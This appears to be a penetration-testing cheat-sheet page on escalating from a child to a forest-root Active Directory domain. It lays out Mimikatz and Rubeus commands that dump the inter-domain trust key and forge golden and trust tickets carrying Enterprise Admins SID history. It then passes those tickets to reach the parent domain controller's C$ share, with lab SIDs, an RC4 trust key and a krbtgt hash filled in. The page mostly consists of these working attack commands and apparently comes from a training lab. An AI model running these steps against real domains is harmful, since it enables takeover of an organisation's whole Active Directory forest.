search

Escalating from child to parent domain

Domains in same forest have an implicit two-way trust with other domains. There is a trust key between the parent and child domains.

There are two ways of escalating privileges between two domains of same forest:

  • Krbtgt hash

  • Trust tickets

hashtag
Method 1: Trust ticket

Child to Forest Root using Trust Tickets requires the trust key. (Look for [In] trust key from child to parent)

Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc

hashtag
Forging trust ticket

Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:[child domain] /sid:[sid of child domain] /sids:[sid of parent domain]-519 /rc4:[trust key] /service:krbtgt /target:[parent domain] /ticket:[ticket name]"'

Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:b543d42b31a43e9eab1466fe5ae8e0e3 /service:krbtgt /target:moneycorp.local"'

Invoke-Rubeus -Command "asktgs /ticket:[trust ticket name] /service:CIFS/[parent domain controller FQDN] /dc:[parent domain controller FQDN] /outfile:[trust name]"

Invoke-Rubeus -Command "asktgs /ticket:trust.kirbi /service:CIFS/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /outfile:mcorpEA.kirbi"

Invoke-Rubeus -Command "ptt /ticket:[ticket name]"

Invoke-Rubeus -Command "ptt /ticket:mcorpEA.kirbi"

ls \\mcorp-dc.moneycorp.local\c$

hashtag
Method 2: Krbtgt hash

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ptt"'

hashtag
Remote code execution on forest root domain controller

PreviousResource-based Constrained DelegationNextAbusing inter-forest trust

Last updated